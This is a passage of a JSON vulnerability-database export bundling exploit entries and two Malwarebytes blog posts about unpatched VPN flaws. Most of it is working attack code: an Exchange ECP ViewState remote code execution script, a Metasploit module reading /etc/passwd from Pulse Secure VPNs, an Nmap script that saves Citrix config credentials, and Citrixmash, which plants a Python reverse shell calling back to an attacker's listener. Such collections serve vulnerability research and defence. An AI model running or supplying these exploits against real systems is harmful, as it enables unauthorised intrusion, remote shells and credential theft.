sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\r\n except: sVersion = 'favicon'\r\n if 'favicon' in sVersion:\r\n print('[*] Problem, this user has never logged in before (wizard detected)')\r\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\r\n exit(1)\r\n print('[+] Detected OWA version number '+sVersion)\r\n\r\n ## Verify ViewStateValue\r\n sViewState = ''\r\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\r\n except: pass\r\n if sViewState == 'B97B4E27':\r\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\r\n else:\r\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\r\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\r\n if ans == '' or ans.lower() == 'n': exit(1)\r\n return sSessionId, sTarget, sViewState\r\n \r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\r\n parser.add_argument('-u', '--username', help='Username (e.g. joe or [email\u00a0protected])', default='')\r\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\r\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\r\n args = parser.parse_args()\r\n if args.target == '' or args.username == '' or args.command == '':\r\n print('[!] Example usage: ')\r\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\r\n else:\r\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\r\n else: sPassword = args.password\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n oCookjar = cookielib.CookieJar()\r\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\r\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\r\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\r\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\r\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\r\n if ans.lower() == 'n': exit(0)\r\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\r\n print('[+] Got Payload: ' + sPayLoad)\r\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\r\n print(' Sending now ...')\r\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\r\n except urllib2.HTTPError, e:\r\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\n\n# 0day.today [2020-03-04] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34037"}], "dsquare": [{"lastseen": "2019-09-21T09:45:20", "bulletinFamily": "exploit", "description": "File disclosure vulnerability in Pulse Connect Secure SSL VPN\n\nVulnerability Type: File Disclosure", "modified": "2019-08-27T00:00:00", "published": "2019-08-27T00:00:00", "id": "E-688", "href": "", "type": "dsquare", "title": "Pulse Connect Secure File Disclosure", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2019-10-18T17:31:38", "bulletinFamily": "blog", "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-10-18T16:36:36", "published": "2019-10-18T16:36:36", "id": "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": "https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T16:33:47", "bulletinFamily": "blog", "description": "Last week, Malwarebytes Labs reviewed [active and unique exploit kits](<https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/>) targeting consumers and businesses alike, reported about [a flaw in WhatsApp](<https://blog.malwarebytes.com/cybercrime/2019/05/whatsapp-fix-goes-live-after-targeted-attack-on-human-rights-lawyer/>) used to target a human rights lawyer, and wrote about [an important Microsoft patch](<https://blog.malwarebytes.com/cybercrime/2019/05/microsoft-pushes-patch-to-prevent-wannacry-level-vulnerability/>) that aimed to prevent a \"WannaCry level\" attack. We also profiled [the Dharma ransomware](<https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/>)\u2014aka CrySIS\u2014and imparted [four lessons from the DDoS attack](<https://blog.malwarebytes.com/101/2019/05/4-lessons-to-be-learned-from-the-does-ddos-attack/>) against the US Department of Energy that disrupted major operations.\n\n### Other cybersecurity news\n\n * Cybersecurity agencies from Canada and Saudi Arabia issued advisories about [hacking groups actively exploiting Microsoft SharePoint server vulnerabilities](<https://www.zdnet.com/article/microsoft-sharepoint-servers-are-under-attack/>) to gain access to private business and government networks. A different patch for the flaw, which was officially designated as [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), was already available as of February this year. (Source: ZDNet)\n * Nefarious actors behind adware try hard to be legit\u2014or at least look the part. A recent discovery of [a pseudo-VPN called Pirate Chick VPN](<https://www.bleepingcomputer.com/news/security/fake-pirate-chick-vpn-pushed-azorult-info-stealing-trojan/>) in an adware bundle was one of the ways they attempted to do this. However, the software is actually a Trojan that pushes malware, particularly the AZORult information stealer. (Source: Bleeping Computer)\n * [SIM-swapping](<https://businesstech.co.za/news/technology/315082/this-is-how-much-money-south-africans-are-losing-to-sim-swap-fraud/>), the fraudulent act of convincing a mobile carrier to swap a target's phone number over to a SIM card owned by the criminal, doubled in South Africa. This scam is used to divert incoming SMS-based tokens used in 2FA-enabled accounts. (Source: BusinessTech)\n * [Ransomware attacks on US cities are on the uptick](<https://www.abcactionnews.com/news/national/crippling-ransomware-attacks-targeting-us-cities-on-the-rise>). So far, there have been 22 known attacks this year. (Source: ABC Action News)\n * [Typosquatting](<https://blog.malwarebytes.com/glossary/typosquatting/>) is back on the radar, and it's mimicking online major new websites to push out fake news or disinformation reports, according to [a report from The Citizen Lab](<https://citizenlab.ca/2019/05/burned-after-reading-endless-mayflys-ephemeral-disinformation-campaign/>). Some of the sites copied were Politico, Bloomberg, and The Atlantic. The group behind this campaign is Endless Mayfly, an Iranian \"disinformation supply chain.\" (Source: The Citizen Lab)\n * No surprise here: Researchers from Charles III University of Madrid (Universidad Carlos III de Madrid) and Stony Brook University in the US found that [Android smartphones are riddled with bloatware](<https://nakedsecurity.sophos.com/2019/05/13/study-finds-android-smartphones-riddled-with-suspect-bloatware/>), which creates hidden privacy and security risks to users. (Source: Sophos's Naked Security Blog)\n * Organizations who are using the cloud to store PII [were considering moving back to on-premise means to store data](<https://www.netwrix.com/survey_organizations_that_store_customer_pii_in_the_cloud_consider_moving_it_back_on_premises_due_to_security_concerns.html>) due to cloud security concerns, according to a survey. (Source: Netwrix)\n * The Office of the Australian Information Commissioner (OAIC) recently released [a report about their findings on breaches in healthcare](<https://www.crn.com.au/news/health-sector-still-plagued-by-breaches-according-to-latest-oaic-report-525046>), which is still an ongoing problem. They found that such breaches were caused mainly by human error. (Source: CRN)\n * Websites of retailers are continuously [facing billions of hacking attempts every year](<https://biztechmagazine.com/article/2019/05/retailers-are-under-siege-botnets>), according to an Akamai Technology report. Consumers should take this as a wake-up call to stop reusing credentials across all their online accounts. (Source: BizTech Magazine)\n * After the discovery of Meltdown and Spectre, security flaws found in Intel and AMD chips, [several researchers have again uncovered another flaw](<https://www.wired.com/story/intel-mds-attack-speculative-execution-buffer/>) that could allow attackers to eavesdrop on every piece of user data that a processor touches. Intel collectively calls attacks against this flaw as Microarchitectural Data Sampling (MDS). (Source: Wired)\n\nStay safe, everyone!\n\nThe post [A week in security (May 13 - 19)](<https://blog.malwarebytes.com/security-world/2019/05/a-week-in-security-may-13-19/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-05-20T15:57:29", "published": "2019-05-20T15:57:29", "id": "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "href": "https://blog.malwarebytes.com/security-world/2019/05/a-week-in-security-may-13-19/", "type": "malwarebytes", "title": "A week in security (May 13 \u2013 19)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "bulletinFamily": "exploit", "description": "\nPulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "href": "", "title": "Pulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "type": "exploitpack", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\n# Google Dork: inurl:/dana-na/ filetype:cgi\n# Date: 8/20/2019\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\n# Vendor Homepage: https://pulsesecure.net\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n# Tested on: Linux\n# CVE : CVE-2019-11510 \nrequire 'msf/core'\nclass MetasploitModule < Msf::Auxiliary\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Post::File\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'Pulse Secure - System file leak',\n\t\t\t'Description' => %q{\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\n This exploit reads /etc/passwd as a proof of concept\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\t\t\t},\n\t\t\t'References' =>\n\t\t\t [\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\n\t\t\t ],\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t 'DefaultOptions' =>\n\t\t {\n\t\t 'RPORT' => 443,\n\t\t 'SSL' => true\n\t\t },\n\t\t\t))\n\n\tend\n\n\n\tdef run()\n\t\tprint_good(\"Checking target...\")\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\n\n\t\tif res && res.code == 200\n\t\t\tprint_good(\"Target is Vulnerable!\")\n\t\t\tdata = res.body\n\t\t\tcurrent_host = datastore['RHOST']\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\n\t\t\tFile.delete(filename) if File.exist?(filename)\n\t\t\tfile_local_write(filename, data)\n\t\t\tprint_good(\"Parsing file.......\")\n\t\t\tparse()\n\t\telse\n\t\t\tif(res && res.code == 404)\n\t\t\t\tprint_error(\"Target not Vulnerable\")\n\t\t\telse\n\t\t\t\tprint_error(\"Ooof, try again...\")\n\t\t\tend\n\t\tend\n\tend\n\tdef parse()\n\t\tcurrent_host = datastore['RHOST']\n\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\n\t words = 0\n\t while (line = fileObj.gets)\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\n\t \tfor ar in array_data\n\t \t\tif ar != \"............................................................\"\n\t \t\t\tprint_good(ar)\n\t \t\tend\n\t \tend\n\t \t#print_good(printable_data)\n\n\t\tend\n\t\tfileObj.close\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "href": "", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "type": "exploitpack", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\n# Date: 2019-12-17\n# CVE: CVE-2019-19781\n# Vulenrability: Path Traversal\n# Vulnerablity Discovery: Mikhail Klyuchnikov\n# Exploit Author: Dhiraj Mishra\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\n# Vendor Homepage: https://www.citrix.com/\n# References: https://support.citrix.com/article/CTX267027\n# https://github.com/nmap/nmap/pull/1893\n\nlocal http = require \"http\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal io = require \"io\"\n\ndescription = [[\nThis NSE script checks whether the traget server is vulnerable to\nCVE-2019-19781\n]]\n---\n-- @usage\n-- nmap --script https-citrix-path-traversal -p <port> <host>\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\noutput='file.txt'\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open http\n-- | CVE-2019-19781:\n-- | Host is vulnerable to CVE-2019-19781\n-- @changelog\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\n-- traversal vulnerability that allows attackers to read configurations or\nany other file.\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2019</elem>\n-- <elem key=\"day\">17</elem>\n-- <elem key=\"month\">12</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">17-12-2019</elem>\n-- <table key=\"extra_info\">\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\n-- </table>\n-- </table>\n\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\n\nportrule = shortport.ssl\n\naction = function(host,port)\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\n local vuln = {\n title = 'Citrix ADC Path Traversal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\n12.1, and 13.0 are vulnerable\nto a unauthenticated path traversal vulnerability that allows attackers to\nread configurations or any other file.\n ]],\n references = {\n 'https://support.citrix.com/article/CTX267027',\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\n },\n dates = {\n disclosure = {year = '2019', month = '12', day = '17'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local path = \"/vpn/../vpns/cfg/smb.conf\"\n local response\n local output = {}\n local success = \"Host is vulnerable to CVE-2019-19781\"\n local fail = \"Host is not vulnerable\"\n local match = \"[global]\"\n local credentials\n local citrixADC\n response = http.get(host, port.number, path)\n\n if not response.status then\n stdnse.print_debug(\"Request Failed\")\n return\n end\n if response.status == 200 then\n if string.match(response.body, match) then\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\nSCRIPT_NAME,host.targetname or host.ip, path)\n vuln.state = vulns.STATE.VULN\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\nor host.ip,port.number, path))\n if outputFile then\n credentials = response.body:gsub('%W','.')\nvuln.check_results = stdnse.format_output(true, citrixADC)\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\nstored in the output file\")\nfile = io.open(outputFile, \"a\")\nfile:write(credentials, \"\\n\")\n else\n vuln.check_results = stdnse.format_output(true, citrixADC)\n end\n end\n elseif response.status == 403 then\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\nor host.ip, path, response.status)\n vuln.state = vulns.STATE.NOT_VULN\n end\n\n return vuln_report:make_output(vuln)\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "href": "", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "type": "exploitpack", "sourceData": "#!/usr/bin/python3\n#\n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\n#\n# You only need a listener like netcat to catch the shell.\n#\n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White\n#\n# Tool Written by: Rob Simon and David Kennedy\n\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings\nimport random\nimport string\nimport time\nfrom random import randint\nimport argparse\nimport sys\n\n# random string generator\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n# our random string for filename - will leave artifacts on system\nfilename = randomString()\nrandomuser = randomString()\n\n# generate random number for the nonce\nnonce = randint(5, 15) \n\n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script\n# note that the file location will be in /netscaler/portal/templates/filename.xml\ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):\n\n # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)\n encoded = \"\"\n i=0\n text = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport))\n while i < len(text):\n encoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \"\n i += 1\n encoded = encoded[:-3]\n payload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\"\n headers = ( \n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n data = (\n {\n \"url\" : \"127.0.0.1\",\n \"title\" : payload,\n \"desc\" : \"desc\",\n \"UI_inuse\" : \"a\"\n })\n\n url = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport))\n requests.post(url, data=data, headers=headers, verify=False)\n\n# this is our second stage that triggers the exploit for us\ndef stage2(filename, randomuser, nonce, victimip, victimport):\n headers = (\n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '%s' % (randomuser),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n requests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False)\n\n\n# start our main code to execute\nprint('''\n\n .o oOOOOOOOo OOOo\n Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO\n OboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO\n OOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB'\n `O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo\n .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO\n OOOOO '\"OOOOOOOOOOOOOOOO\"` oOO\n oOOOOOba. .adOOOOOOOOOOba .adOOOOo.\n oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO\n OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO\n \"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\"\n Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`\n : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .\n . oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo\n '%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO':\n `$\" `OOOO' `O\"Y ' `OOOO' o .\n . . OP\" : o .\n :\n\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\nTool Written by: Rob Simon and Dave Kennedy\nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\n\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\n\nBe sure to cleanup these two file locations:\n /var/tmp/netscaler/portal/templates/\n /netscaler/portal/templates/\n\nUsage:\n\npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''')\n\n# parse our commands\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\")\nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\")\nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\")\nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\")\nargs = parser.parse_args()\nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\")\nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename))\n# trigger our first post\nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)\nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\")\ntime.sleep(2)\nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\")\nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\")\nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\")\n# trigger our second post\nstage2(filename, randomuser, nonce, args.target, args.targetport)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "bulletinFamily": "exploit", "description": "\nCitrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "modified": "2020-01-13T00:00:00", "published": "2020-01-13T00:00:00", "id": "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "href": "", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "type": "exploitpack", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC Remote Code 